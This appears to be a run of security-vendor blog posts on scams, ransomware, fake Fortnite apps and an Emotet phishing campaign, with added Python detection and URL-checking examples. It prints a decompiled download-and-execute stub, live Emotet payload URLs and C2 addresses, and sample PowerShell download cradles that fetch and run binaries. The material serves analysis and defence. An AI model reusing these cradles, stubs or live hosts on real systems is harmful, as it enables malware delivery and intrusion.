What is Internet Security?

Reading Time: 5 minutes

Internet security is the branch of computer security concerned with protecting systems and transactions that are exposed to the Internet. It covers attacks that target browsers, networks, operating systems and the applications that run on them. Businesses and governments are increasingly concerned with defending against cyber attacks and malware that arrive over the Internet. The main aim of Internet security is to set up precise rules and controls that deflect attacks originating from the Internet.

Internet security relies on specific resources and criteria for safeguarding data that is communicated or transferred online. The protection techniques include various kinds of encryption, such as Pretty Good Privacy (PGP). Other components of a secure Web setup include firewalls that block unwanted traffic, and anti-spyware, anti-malware and anti-virus programs that run on particular networks or devices and watch online traffic for malicious attachments.


Good Internet security protects financial details and much else that is held on a company's or agency's servers and network hardware. Inadequate Internet security can bring down any business whose financial or sensitive data is routed over the Web.

Internet Security Essentials – Know About the Internet Security Scam

One of the best-known examples of an Internet security scam is Internet Security Essentials, a rogue security program that claims to protect Windows computers against malware and viruses but installs itself by means of a trojan horse. The fake antivirus program affected Microsoft operating systems including Windows 9x, 2000, XP, Vista, Windows 7 and Windows 8. It belongs to the "FakeVimes" family of fake antivirus malware.

Internet Security Essentials Alert is a fake program that is part of a scam devised chiefly to deceive the user into paying money for a product that is itself malware.

Internet Security Essentials behaves like a rogue antivirus product. It uses scare tactics and tricks the user into believing that it is associated with Windows, in order to make the user pay for malware/virus removal. The symptoms of an Internet Security Essentials infection are fairly standard. Once the computer is infected, the user sees a fake home screen designed to look like a window belonging to a Windows system component. The fake interface runs phony system scans to deceive the user.

The scan reports many threats on the user's computer that are not actually present, although a few fake malware files are genuinely planted by the Internet Security Essentials program itself. The user is then asked to click a button labelled "Remove all"; when they do, the fake program responds with a message asking them to pay for the full version of the software to complete the cleanup. The user is directed to a bogus website that claims to be the company website of Internet Security Essentials, but which is simply the payment site for the scam.

Types of Internet Security Devices and Software For Business

A variety of Internet security devices and tools are needed today by businesses and government organizations. One type helps detect intrusions, while the other helps prevent them. These tools greatly help IT staff recognize issues and keep computer networks safe from threats.

Sophisticated programs are expected to recognize a range of threats and ward off the corresponding attacks, covering viruses, spyware, worms and other malware. Detection tools closely observe the system and raise an alarm for the operations team to investigate when malicious activity is taking place on the network. Prevention systems (anti-malware systems), on the other hand, monitor activity live and are able to block attacks as they happen.

Comodo Internet Security packs all of this together and provides protection 24/7, even when the user is not watching their computer.

Advantages and Features of Comodo Internet Security

The Comodo Internet Security Suite protects against most online attacks and malware that could steal sensitive data stored on a computer. The security suite robustly stops hackers from accessing financial details and personal information.

Malware arriving from the Internet can hold a system hostage and demand money, or secretly gather sensitive information about users' computing habits, Internet activity, keystrokes and more. Stay protected from all of these threats with the latest version of Comodo Internet Security.

Comodo Internet Security Key Features

  • Antivirus: Tracks down and destroys any existing malware hiding on a PC.
  • Anti-Spyware: Detects spyware threats and destroys each infection.
  • Anti-Rootkit: Scans for, detects and removes rootkits on your computer.
  • Bot Protection: Prevents malicious software from turning your PC into a zombie.
  • Defense+: Protects critical system files and blocks malware before it installs.
  • Auto Sandbox Technology: Runs unknown files in an isolated environment where they can cause no damage.
  • Memory Firewall: Cutting-edge protection against sophisticated buffer overflow attacks.
  • Anti-Malware: Kills malicious processes before they can do harm.

For more details, see the official page of Comodo Internet Security.

Indian Hospitals Crippled by Ransomware Attacks

Reading Time: 3 minutes

Ransomware is dreadful enough when it hits consumer PCs and smartphones, but it is also frequently used to target organizations and institutions around the world. WannaCry's effect on the UK's NHS public healthcare system last year highlighted how harmful ransomware can be when it hits hospital computers.

This past February, I wrote about a ransomware attack on an American hospital where the target actually paid the ransom in order to restore operations:

“On January 11th, Hancock Regional Hospital in Indiana discovered that their computers had been infected with SamSam ransomware, a malware variant which has existed since early 2016. The hospital decided to pay the four Bitcoin ransom in order to get their files decrypted, which was worth around $55,000 USD at the time…

Hancock Regional Hospital is the anchor of the Hancock Health network, with several facilities in the area east of Indianapolis. The Regional Hospital itself is in Greenfield, Indiana.

When hospital workers discovered the SamSam attack on January 11th, they engaged their incident response and crisis management plan and engaged the hospital legal team and an outside cybersecurity firm. They also contacted the FBI cybercrime task force…

‘We were in a very precarious situation at the time of the attack,’ Hancock Health CEO Steve Long said. ‘With the ice and snow storm at hand, coupled with one of the worst flu seasons in memory, we wanted to recover our systems in the quickest way possible and avoid extending the burden toward other hospitals of diverting patients. Restoring from backup was considered, though we made the deliberate decision to pay the ransom to expedite our return to full operations.’”

In similar fashion, on July 15th, workers at Mahatma Gandhi Mission Hospital in Navi Mumbai, India found ransomware on their computers. Hospital administrators found their systems locked and a message demanding a Bitcoin ransom for decryption. All of their data from the previous fifteen days was encrypted, and the computerized billing and prescription systems were inoperable. Neither the amount of the ransom nor the strain of ransomware has been reported.

The Cyber Cell of the Navi Mumbai police is investigating the incident. “We are trying to ascertain the Internet Protocol Address (IP) from where the email (demanding ransom) originated,” said Deputy Commissioner of Police Tushar Doshi.

Meanwhile, another Indian hospital was hit by ransomware at the same time. The attack on MGM New Bombay Hospital in Vashi was also discovered on July 15th. The affected systems and data, and the strain of ransomware, have not been reported. The ransom note demanded Bitcoin but did not specify an amount.

Hospital administrator P.K. Shashanker said “Around 9 PM on Sunday, a system message popped up saying that our system had been hacked and we should contact the culprits to retrieve our data. They had provided an email address, but we did not write to them and filed an FIR on Monday. Our technical team is working on retrieving the data. The hospital has not faced any financial loss.” Vashi Police are investigating.

I can’t be certain with limited information, but I suspect that the attacks may be connected and deployed by the same cyber attackers. Both attacks were discovered on July 15th, and both targeted Indian hospitals.

There are reasons why hospitals are often ransomware targets. Stu Sjouwerman of the cybersecurity firm KnowBe4 said, “If you have patients, you are going to panic way quicker than if you are selling sheet metal. (Hospitals) have not trained their employees on security awareness … and hospitals don’t focus on cybersecurity in general.”

Sjouwerman also says that American hospitals are often focused instead on HIPAA compliance for medical data privacy. HIPAA compliance and protecting medical data are important. But so is teaching hospital staff not to open email attachments from unfamiliar senders, and properly securing Remote Desktop Protocol deployments; these are two of the most frequent vectors for ransomware attacks. Data privacy and ransomware prevention: why not do both?

Sjouwerman continued, stating that security awareness training for staff is quite feasible and is worth the effort. “You can actually truly get a dramatic decrease in click-happy employees. You send them frequent simulated phishing attacks, and it starts to become a game. You make it part of your culture and if you, once a month, send a simulated attack, that will get people on their toes.”

The Way of Double Deception: Why Unwanted Applications are a Greater Threat than You Realize

Reading Time: 4 minutes

Many people do not regard Potentially Unwanted Applications (PUA) as a serious danger. The reason for this careless attitude is that a PUA is usually installed with the user's consent. But this view is a big mistake, and not only because a PUA can covertly install other programs such as adware or spyware on a drive-by download basis. The example below, analyzed by Comodo Threat Research Labs experts, clearly demonstrates that a PUA can be a far more threatening weapon.

Meet the software named “Instagram Hacker”. It has an official website, https://hackinstagram.net/, and promises to hack any Instagram account. Better still, you can download and install it for free.

Instagram Hacker
After installation, it prompts for an Instagram profile URL and offers to hack the account's password.

Instagram Password Hacker

The result comes back in a few seconds:

But after clicking the “View Password” button, a new window appears:

Instagram Hacker View Password

Clicking the “Get An Activation Code” button redirects to a “Buy” page.

Instagram Hacker activation code

It offers to sell an “Activation Code”, but … can you smell fraud in the air? Obviously, no software that can break an Instagram password in seconds can exist. So is Instagram Hacker just another tool for duping the gullible? The best way to check is to look inside the application code.

The code is protected with Dotnet Reactor (.NET Reactor) but can be decoded with the de4dot tool.

de4dot tool


de4dot tool - 2

Now we can see for certain that the application is a fraud tool. The first fragment of code merely fakes the progress indicator.

The second fragment is more interesting. As you can see, it contains a URL for an executable that is downloaded once activation succeeds.

    // Constructor of the LoadingWindow form, as recovered by de4dot.
    LoadingWindow()
    {
        Class2.qDiUy7EzyuIMj();                 // obfuscator runtime initialisation
        this.filename = "view.exe";
        // Hard-coded, plaintext-HTTP download location for the "activated" payload.
        this.uri = new Uri("http://software-logistics.net/external/component/download/view.exe");
        this.InitializeComponent();
        if (File.Exists(this.filename))
        {
            File.Delete(this.filename);         // replace any previous copy
        }
        try
        {
            WebClient client1 = new WebClient();
            client1.DownloadFileAsync(this.uri, this.filename);
            // Handlers are wired up after the download has already been started.
            client1.DownloadProgressChanged += new DownloadProgressChangedEventHandler(this.method_1);
            client1.DownloadFileCompleted += new AsyncCompletedEventHandler(this.method_2);
        }
        catch
        {
            this.method_0();                    // silently fall back on failure
        }
    }

If we run the executable, we find that it is the WebBrowserPassView application from NirSoft:

WebBrowserPassView
https://www.nirsoft.net/utils/web_browser_password.html

WebBrowserPassView is simply a password-recovery tool that reveals the passwords stored by web browsers. So the only passwords this software can extract are not Instagram account passwords but the user's own passwords kept in their browser!

To sum up: all Instagram Hacker does is download and launch another PUA from NirSoft, so we are clearly dealing with a fraud tool. Notice the manipulative psychological trick here: if a victim discovers she was cheated, she is unlikely to report the incident to the police, because she would have to confess to attempting to hack Instagram, which is itself a cybercrime.

But that is only the thin end of the wedge.

The most dangerous aspect is that the URL in the application can easily be changed to any other URL serving a malicious file, which will then be executed on the victim's machine. So this PUA, like many other examples of this type, can be used for the mass distribution of “heavy” malware such as trojans, backdoors and ransomware.

This is a good reason to treat PUA as genuinely dangerous malware: they may turn out to be the springboard for a devastating large-scale cyberattack.
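The triage reasoning above (a hard-coded plaintext-HTTP URL, a download call, an execute call, and nothing that verifies what was downloaded) can be turned into a small static check. The following is an added example, not code from the post or from Comodo's analysis: it scans decompiled .NET source (or `strings` output) for a download-and-execute stub and reports whether the fetched payload is verified in any way. The sample source is a trimmed copy of the constructor quoted above plus an assumed completion handler; the real body of method_2 was not shown in the post, and the API name lists are this example's own heuristics.

```python
"""Added triage example (not code from the post): scan decompiled .NET source,
or `strings` output, for a download-and-execute stub and report whether the
payload it fetches is verified in any way. The sample source is a trimmed copy
of the constructor quoted in the post plus an ASSUMED completion handler; the
real body of method_2 was not shown."""
import re
from urllib.parse import urlsplit

URL_RE = re.compile(r"""https?://[^\s"'<>)]+""")
# Heuristic API name lists for this example; extend for the frameworks you see.
DOWNLOAD_APIS = ("DownloadFileAsync", "DownloadFile(", "DownloadData", "DownloadString",
                 "HttpClient", "WebRequest.Create", "URLDownloadToFile")
EXEC_APIS = ("Process.Start", "ShellExecute", "Assembly.Load", "CreateProcess")
INTEGRITY_APIS = ("SHA256", "ComputeHash", "X509Certificate", "WinVerifyTrust", "Authenticode")

SAMPLE_SOURCE = r'''
LoadingWindow()
{
    this.filename = "view.exe";
    this.uri = new Uri("http://software-logistics.net/external/component/download/view.exe");
    WebClient client1 = new WebClient();
    client1.DownloadFileAsync(this.uri, this.filename);
    client1.DownloadFileCompleted += new AsyncCompletedEventHandler(this.method_2);
}
// Assumed for this example: what the completion handler of such a stub typically does.
private void method_2(object sender, AsyncCompletedEventArgs e)
{
    Process.Start(this.filename);
}
'''


def extract_urls(source):
    """Every http(s) literal in the text, deduplicated and sorted."""
    return sorted(set(URL_RE.findall(source)))


def apis_used(source, names):
    return [name for name in names if name in source]


def scan(source):
    urls = extract_urls(source)
    downloads = apis_used(source, DOWNLOAD_APIS)
    execs = apis_used(source, EXEC_APIS)
    integrity = apis_used(source, INTEGRITY_APIS)
    if downloads and execs:
        verdict = "download-and-execute"
    elif downloads:
        verdict = "downloader"
    else:
        verdict = "no network fetch found"
    return {
        "verdict": verdict,
        "payload_urls": urls,
        # Plain http: anyone on the path can swap the payload, not just whoever holds the URL.
        "plaintext_http": [u for u in urls if urlsplit(u).scheme == "http"],
        "download_apis": downloads,
        "exec_apis": execs,
        # No hash or signature check anywhere: whatever the URL serves tomorrow gets run.
        "payload_verified": bool(integrity),
    }


if __name__ == "__main__":
    for key, value in scan(SAMPLE_SOURCE).items():
        print(f"{key:17} {value}")
```

Run it on a de4dot output directory by concatenating the .cs files and passing the text to scan(); a "download-and-execute" verdict with payload_verified False and a plaintext_http entry is exactly the shape the post describes, and it tells you which URL to block or sinkhole.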

“Today we shouldn’t consider malware as dangerous or not-so-dangerous,” says Fatih Orhan, the Head of the Comodo Threat Research Labs. “Any malware does not exist in an isolated space. Nowadays cybercriminals build long malware chains to attack users, and, as you can see, PUA can be a link in such a killing chain. So we should call a spade a spade. Yes, these applications are downloaded and run with users’ approval but, as in this case, the approval is extorted by fraud. However much potentially unwanted applications pretend to be legitimate, everybody needs to understand it’s just a camouflage. That’s why Comodo not only provides high-end technical protection but regularly informs users to keep them away from dangerous traps in cyberspace.”

Live secure with Comodo!

The explosion of fake Fortnite game Android Trojans

Reading Time: 4 minutes

If you’re into gaming, you’ve probably heard of Fortnite: Battle Royale. Epic Games’ popular online title debuted on consoles and PCs in September 2017, on iOS this April, and finally on Android for a handful of device models (Samsung Galaxy S7 / S7 Edge, S8 / S8+, S9 / S9+, Note 8, Note 9, Tab S3 and Tab S4) on August 9th. Unlike iOS, Android lets users bypass the Google Play portal and sideload uncurated apps without jailbreaking the device or performing other unsanctioned activities. On Android, sideloading means installing an app from outside the official Android package repository. Epic took full advantage of that openness to avoid giving Google a 30% cut of its sales, distributing the game through its own website instead.


If you want to install Fortnite: Battle Royale on your Android device, I urge you to go to fortnite.com/android. That URL redirects you to a page on https://www.epicgames.com that depends on your geography. If you find Fortnite for Android hosted anywhere else, it is probably trojan malware. At least seven phishing sites have appeared in recent days for the sole purpose of distributing fake Fortnite Android trojans. By downloading one you will almost certainly end up seriously compromising the security of your Android device and its data, rather than enjoying a fun and legitimate game. Some of the phishing sites even go to the effort of spoofing the UI of the Google Play Store.

google play store
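The advice above amounts to an origin check: the download must come from fortnite.com or epicgames.com, and not from a site that merely contains those names. The following is an added example, not code from the post or from Epic: it shows the substring check people usually write first, why a phishing link defeats it, and a check that handles the usual tricks (a fake "subdomain" such as epicgames.com.attacker.example, credentials in the URL, bare IP addresses, punycode hosts, and plain http). The official domains come from the post; the classification labels, brand tokens and sample links are this example's own constructions and not real phishing sites.

```python
"""Added example (not from the post): decide whether a Fortnite-for-Android
download link really points at Epic's own hosts. The official domains come
from the post; labels, brand tokens and sample links are constructed here."""
import ipaddress
from urllib.parse import urlsplit

OFFICIAL_DOMAINS = ("fortnite.com", "epicgames.com")
BRAND_TOKENS = ("fortnite", "epicgames", "epic-games")


def naive_check(url):
    """The substring test people write first; kept only to show how it is fooled."""
    return any(domain in url for domain in OFFICIAL_DOMAINS)


def in_domain(host, domain):
    """True for the domain itself or a real subdomain (label boundary, not substring)."""
    return host == domain or host.endswith("." + domain)


def official_host(url):
    """Is the host component of url one of Epic's domains, after the usual tricks?"""
    parts = urlsplit(url.strip())
    if parts.username is not None or parts.password is not None:
        return False                      # https://www.epicgames.com@evil.example/
    host = (parts.hostname or "").rstrip(".")   # lower-cased; "epicgames.com." is the same name
    if not host:
        return False
    try:
        ipaddress.ip_address(host)        # a bare IP address is never the official host
        return False
    except ValueError:
        pass
    return any(in_domain(host, domain) for domain in OFFICIAL_DOMAINS)


def is_official_download(url):
    """Official host and HTTPS, so the redirect chain cannot be rewritten in transit."""
    return urlsplit(url.strip()).scheme == "https" and official_host(url)


def classify(url):
    if is_official_download(url):
        return "official"
    if official_host(url):
        return "downgraded-transport"      # right host, but over plain http
    host = urlsplit(url).hostname or ""
    punycode = any(label.startswith("xn--") for label in host.split("."))
    if punycode or not host.isascii():
        return "lookalike"                 # homoglyph / IDN impersonation
    if any(token in url.lower() for token in BRAND_TOKENS):
        return "lookalike"                 # brand name in a host or path Epic does not own
    return "unrelated"


def triage(urls):
    return {url: classify(url) for url in urls}


# Constructed sample links for this example; none of the non-Epic hosts are real sites.
SAMPLE_LINKS = [
    "https://fortnite.com/android",
    "https://www.epicgames.com/fortnite/android",
    "http://fortnite.com/android",
    "https://www.epicgames.com.attacker.example/fortnite.apk",
    "https://www.epicgames.com@attacker.example/fortnite.apk",
    "https://fortnite-apk-download.example/Fortnite.apk",
    "https://203.0.113.5/fortnite.apk",
    "https://example.com/game.apk",
]

if __name__ == "__main__":
    for link, verdict in triage(SAMPLE_LINKS).items():
        print(f"{verdict:20} naive={naive_check(link)!s:5} {link}")
```

The naive check answers True for the epicgames.com.attacker.example link, which is precisely how the spoofed Play Store pages the post mentions get their victims; the label-boundary match in in_domain is what closes that gap. The same structure works for any vendor-hosted download: replace OFFICIAL_DOMAINS and BRAND_TOKENS.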

Some cybersecurity professionals think that Epic’s decision to distribute its Android game itself, rather than through the curated Google Play Store, is a terrible idea. Falanx Group’s Rob Shapland said:

“Epic Games’ decision to publish the Android version of Fortnite outside of the Play Store is a very poor choice for the security of their players. Android devices are already far more susceptible to malware than Apple devices, with the greatest protection being to always download apps from the Play Store as these apps are screened for malware, which prevents most malicious apps from being installed. By encouraging users to download Fortnite outside of the Play Store, Epic Games leave their players vulnerable to malicious copycat apps being installed accidentally if they go to the wrong site. (Epic Games’s decision) normalises the behavior of downloading apps from outside of Play Store, which can only lead to more malicious apps being installed in the long term.”

Sideloading outside Google Play isn’t the first major malware problem associated with Fortnite. In June 2018 the online gaming platform Rainway noticed a major cyber-attack that targeted the Windows version of Fortnite. Gamers sometimes like to cheat and freeload; YouTube videos have appeared claiming to show how to acquire free “V-Bucks” (Fortnite’s in-game currency) and an “aimbot” that is supposed to make it easier for players to shoot their enemies. If an offer like this sounds too good to be true, it probably is!

Rainway CEO Andrew Sampson wrote:

“On the early morning of June 26th, we began receiving hundreds of thousands of error reports to our tracker. Not feeling very excited to see such an influx of events on a Tuesday, the engineering team was a bit flustered; after all, we hadn’t released any updates to that particular piece of our solution.

It became pretty clear soon after that this new flood of errors was not caused by something we did, but by something someone was trying to do.

These are attempts to call various ad platforms; the first thing we should note is that Rainway does not have ads on it, which was an immediate red flag. The first URL, in particular, is JavaScript which is attempting to act and running into an error, triggering our logging. For security and privacy reasons we’ve always whitelisted URLs and the scope of what they can do from within Rainway — it seems now it has the unintended side effect of shining a light on a much broader issue…”

Rainway’s team eventually traced the odd traffic to Fortnite cheating trojans that carried out HTTPS man-in-the-middle attacks:

“We then spun up a virtual machine and ran the hack, it immediately installed a root certificate on the device and changed Windows to proxy all web traffic through itself. A successful Man in the Middle Attack.

Now, the adware began altering the pages of all web requests to add in tags for Adtelligent and voila, we’ve found the source of the problem — now what?

We began by sending an abuse report to the file host, and the download was removed promptly, this was after accumulating over 78,000 downloads. We also reached out to Adtelligent to report the keys linked to the URLs. We have not received a response at this time. SpringServe quickly worked with us to identify the abusive creatives and remove them from their platform.”

If you ever want to download a video game or DLC from outside the official platform store (for example, on PS4, the Sony PlayStation Store, where each application is curated, signed and packaged), make sure you do so from the game developer’s official website. If you’re not confident that the site is the developer’s own, don’t take the risk; err on the side of caution by not downloading at all.

I hope that, as Epic ports Fortnite to more Android devices in the future, they change their mind and switch distribution to the Google Play Store. But with mobile software, as with Pandora’s (loot) box, once opened it is almost impossible to close.

Fortnite trojans reflect a malware trend that Comodo research has observed lately, specifically on Android. Read more about the rise of Android trojans of all kinds in the latest Comodo Global Threat Report for Q2 2018.

Here’s What I Learned From the Latest Comodo Cybersecurity Global Threat Report

Reading Time: 3 minutes

The second quarter 2018 Comodo Cybersecurity Global Threat Report has just been released! I couldn’t wait to read it, and I’m glad I did. It’s my job to keep on top of the rapidly evolving cyber threat landscape, but I was still surprised by what I learned. I’ll tell you which findings were the most interesting to me. But if you want to learn more, you may download the free report for yourself. This intelligence comes from the over 400 million unique malware samples worldwide that Comodo has detected during the second quarter of the year.

An International Perspective

Trojan infections are on the rise. Comodo has noticed a trend of phishing emails spreading trojans through attachments and hyperlinks. Once the user is fooled into opening an attachment or clicking a link, the trojan becomes a malicious foot in the door for a payload that is often delivered through command-and-control servers. Of all the countries where Comodo monitors malware, Germany topped the list for trojans.

Malware trends often correlate with world events, so time spent reading about them is time well spent. The anniversary of China’s Tiananmen Square protests, Donald Trump and Vladimir Putin’s meeting in Helsinki, Finland, Armenia’s political revolution, and the tension between Donald Trump and Kim Jong Un were all reflected in malware infection trends that were unlikely to be coincidences. Often these trends are the result of cyberwarfare; at other times hacktivism is the likely motive.

Cryptominers have become a little less frequent, but often a lot more harmful. Much of the latest cryptomining malware has impressive evasion and persistence techniques. Perhaps the only symptom you will notice of a cryptominer infection is unusual demand on a client’s CPU and memory. That really worries me.

Android is now one of the top platforms for malware. Comodo Threat Research Labs has seen a tremendous increase in both quantity and variety. Be really, really careful about sideloading Android apps; to reduce your risk, you should probably install apps only from the Google Play Store. Phishing emails and websites are another common source of Android malware. Spyware is the most common type of Android malware, and Comodo has noticed it becoming better at evading detection.

Ukraine and Russia were the most common countries for viruses; India, Turkey and Russia (again!) for worms; and the United Kingdom for backdoors.

The Worst Trojan

The single most common trojan found in the second quarter is TrojWare.Win32.Injector. It spreads by phishing, more specifically an email designed to look as if it comes from a shipping and trading company. If the user executes the malicious file it carries, sensitive data from web browsers, email clients, FTP clients, WebDAV clients and SCP clients is sent to the attacker.

Sneakier Cryptominers

I mentioned that newer cryptominers are getting better at evading detection. That is often because fileless cryptominers are becoming more common. Fileless malware runs in the target’s CPU and memory without leaving a trace on the hard disk or any other storage; instead, it injects itself into already running processes. So scanning your hard drive will not find these pests.

BadShell is a cryptominer that fits the above description exactly. It abuses Windows PowerShell to execute its commands, stores its malicious binaries in the Windows registry, and persists through Task Scheduler.

BadShell and other cryptominers can do serious harm to an organization’s network by diverting computing power to generating cryptocurrency rather than the work your clients and servers are supposed to be doing.

The Android Malware Explosion

People like me use our Android phones to organize our lives. I schedule my weeks for business and leisure, do my online banking, buy stuff, check the weather reports from my nearest weather station, plan my public transit travel, and read my email, all with my Android phone. There are millions of users like me, and that’s why Android is a popular platform for spyware. Acquiring my phone’s private data would tell you so much about me and my life! And I’m just an ordinary person, really. If I were a prominent CEO or other sort of public figure, data acquired from me could be sold by cyber attackers for big bucks on the Dark Web.

Some of the most common Android spyware detected by Comodo includes KevDroid, ZooPark, MikeSpy and Stalker Spy.

I’m just skimming the surface of the valuable insights you can learn from Comodo Cybersecurity’s Global Threat Report Q2 2018. If I piqued your curiosity, you can download your own copy of the report.

New Immense Attack of Emotet Trojan Targeted Thousands of Users

Reading Time: 4 minutes

If you ask a malware analyst to name the most dangerous and nefarious trojans, Emotet will definitely be on the list. According to the National Cybersecurity and Communications Integration Center, the trojan “continues to be among the most costly and destructive malware affecting state, local, tribal, and territorial governments, and the private and public sectors”. Cunning and sneaky, it is spread massively around the world. A new, immense four-day Emotet attack was intercepted by Comodo’s anti-malware facilities.

The attack began with a phishing email sent to 28,294 users.

phishing email

As you can see, the email imitates a DHL shipment and delivery notification. The famous brand name serves to inspire trust in users, and curiosity also plays its part, so the chances that a victim will click the link in the email without thinking are very high. The moment the victim clicks the link, the attackers’ black magic comes into play.

Clicking the link downloads a Word file. Of course, the Word file has nothing to do with any delivery, except the delivery of malware: it contains malicious macro code. Because Microsoft now disables macros by default in its products, the attackers need to trick the user into running an older version. That is why the following banner appears when a victim tries to open the file.

trojan

If the user obeys the attackers’ request, the macro script carries out its mission: rebuilding an obfuscated command line (the “shell code”) and executing it through cmd.exe.

After rebuilding the obfuscated code, cmd.exe launches PowerShell, which tries to download and execute a binary from the first available URL in the following list:

http://deltaengineering.users31.interdns.co.uk/KepZJXT
http://d-va.cz/ZVjGOE9
http://dveri509.ru/y1
http://www.dupke.at/rFQA
http://clearblueconsultingltd.com/VkIiR

At the time of writing, only the last one served a binary, 984.exe.

The binary, as you may guess, is a sample of the Emotet banking trojan.

Once executed, the binary copies itself to C:\Windows\SysWOW64\montanapla.exe.

It then creates a service named montanapla, which ensures that the malicious process is launched at every startup.

Next, it tries to connect to its command-and-control (C2) servers (181.142.74.233, 204.184.25.164, 79.129.120.103, 93.88.93.100) to report the new victim to the attackers. Then the malware waits for the attackers’ commands.

Now a covert remote connection to the C2 server is established, and Emotet is ready to execute any command from the attackers. Usually it ferrets out private data on the infected machine, with banking information a priority. But that’s not all: Emotet is also used to deliver many other types of malware to the infected machine, so an Emotet infection can be just the first link in an endless chain of compromises of the victim’s computer.

Emotet is not satisfied with compromising a single PC; it tries to infect other hosts on the network. In addition, Emotet is well equipped to hide from and bypass anti-malware tools. Being polymorphic, it avoids signature-based antivirus detection. It can also detect a virtual machine environment and disguise itself by generating false indicators. All of this makes it a hard nut for security software to crack.
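The chain described above (Word document spawning cmd.exe, cmd.exe spawning a PowerShell download cradle, a dropped binary registered as a service from SysWOW64, beaconing to the listed C2 addresses) is exactly what endpoint telemetry rules are written against, and the same rule set covers the registry-stored binaries and Task Scheduler persistence of fileless miners such as the BadShell sample described in the Q2 threat report above. The following is an added example, not code from the post or a Comodo product: a handful of detection rules run over constructed Sysmon-style events. The C2 addresses, the service name and the SysWOW64 path come from the post; the event shapes, field names, baseline service list, the PowerShell command lines and the miner stager are assumptions made for this example.

```python
"""Added detection example (not code from the post): rules for the Emotet chain
and for BadShell-style fileless persistence, run over constructed Sysmon-style
events. Event shapes, field names and sample values are assumptions."""
import base64
import re

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
PS_IMAGES = {"powershell.exe", "pwsh.exe"}
EMOTET_C2 = {"181.142.74.233", "204.184.25.164", "79.129.120.103", "93.88.93.100"}  # from the post
CRADLE_RE = re.compile(
    r"DownloadFile|DownloadString|Invoke-WebRequest|\biwr\b|Invoke-Expression|\biex\b|Start-BitsTransfer",
    re.IGNORECASE)
ENC_RE = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{20,})", re.IGNORECASE)
BASELINE_SERVICES = {"wuauserv", "Spooler", "EventLog"}        # assumed pre-infection snapshot
UNUSUAL_SERVICE_DIRS = ("\\syswow64\\", "\\temp\\", "\\appdata\\", "\\programdata\\")
REGISTRY_BLOB_BYTES = 64 * 1024  # a value this large is usually a stored binary or script


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_command(text):
    """Plaintext of a PowerShell -EncodedCommand argument (base64 of UTF-16LE), or None."""
    match = ENC_RE.search(text)
    if not match:
        return None
    try:
        return base64.b64decode(match.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def check_powershell(prefix, text):
    """Rules shared by process command lines and scheduled-task actions."""
    hits = []
    decoded = decode_encoded_command(text)
    if decoded:
        hits.append((prefix + "_encoded", decoded))
        text = text + " " + decoded            # inspect the decoded script as well
    cradle = CRADLE_RE.search(text)
    if cradle:
        hits.append((prefix + "_download_cradle", cradle.group(0)))
    return hits


def detect(events):
    hits = []
    for ev in events:
        kind = ev["type"]
        if kind == "process":
            image, parent = basename(ev["image"]), basename(ev.get("parent", ""))
            if parent in OFFICE_APPS and image in SHELLS:
                hits.append(("office_spawns_shell", f"{parent} -> {image}"))
            if image in PS_IMAGES:
                hits.extend(check_powershell("powershell", ev.get("cmdline", "")))
        elif kind == "service_create":
            low = ev["image"].lower()
            if ev["name"] not in BASELINE_SERVICES and any(d in low for d in UNUSUAL_SERVICE_DIRS):
                hits.append(("new_service_unusual_path", f"{ev['name']} -> {ev['image']}"))
        elif kind == "network":
            if ev["dst"] in EMOTET_C2:
                hits.append(("emotet_c2", f"{ev['dst']}:{ev['dport']}"))
        elif kind == "registry_set":
            if ev["size"] >= REGISTRY_BLOB_BYTES:
                hits.append(("large_registry_blob", f"{ev['key']} ({ev['size']} bytes)"))
        elif kind == "task_create":
            if basename(ev["action"].split(" ", 1)[0]) in PS_IMAGES:
                hits.extend(check_powershell("scheduled_task", ev["action"]))
    return hits


def summarize(events):
    counts = {}
    for rule, _ in detect(events):
        counts[rule] = counts.get(rule, 0) + 1
    return counts


# Constructed telemetry: the Emotet chain from the post, a BadShell-style miner, benign noise.
MINER_STAGER = "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.20/m.ps1')"  # made up
ENCODED = base64.b64encode(MINER_STAGER.encode("utf-16le")).decode("ascii")
EVENTS = [
    {"type": "process", "image": "C:\\Program Files\\Microsoft Office\\Office16\\WINWORD.EXE",
     "parent": "explorer.exe", "cmdline": "WINWORD.EXE /n DHL_shipment.doc"},
    {"type": "process", "image": "C:\\Windows\\System32\\cmd.exe", "parent": "WINWORD.EXE",
     "cmdline": "cmd /c powershell -nop -w hidden -ep bypass -c ..."},
    {"type": "process", "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "parent": "cmd.exe", "cmdline": "powershell -nop -w hidden -ep bypass -c \"(New-Object Net.WebClient)"
     ".DownloadFile('http://clearblueconsultingltd.com/VkIiR','984.exe');Start-Process 984.exe\""},
    {"type": "service_create", "name": "montanapla", "image": "C:\\Windows\\SysWOW64\\montanapla.exe"},
    {"type": "service_create", "name": "Spooler", "image": "C:\\Windows\\System32\\spoolsv.exe"},
    {"type": "network", "pid": 4120, "dst": "79.129.120.103", "dport": 443},
    {"type": "network", "pid": 1337, "dst": "198.51.100.7", "dport": 443},
    {"type": "registry_set", "key": "HKLM\\SOFTWARE\\Classes\\CLSID\\{0F7C2A1E}\\Blob", "size": 300_000},
    {"type": "registry_set", "key": "HKCU\\Software\\Contoso\\Version", "size": 16},
    {"type": "task_create", "name": "OneDriveUpdater", "action": "powershell.exe -nop -w hidden -enc " + ENCODED},
    {"type": "process", "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "parent": "svchost.exe", "cmdline": "powershell.exe -nop -w hidden -enc " + ENCODED},
]

if __name__ == "__main__":
    for rule, detail in detect(EVENTS):
        print(f"{rule:32} {detail}")
```

Two design points worth noting. First, the encoded-command rule decodes the base64/UTF-16LE argument and runs the cradle regex over the plaintext too, because "-enc" is how both Emotet loaders and fileless miners hide the download from naive command-line matching. Second, the service rule keys on the combination of "not in baseline" and "binary in an unusual directory": SysWOW64 also holds legitimate 32-bit binaries, so the path alone would be noisy, while a never-before-seen service name alone would flag every software install.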

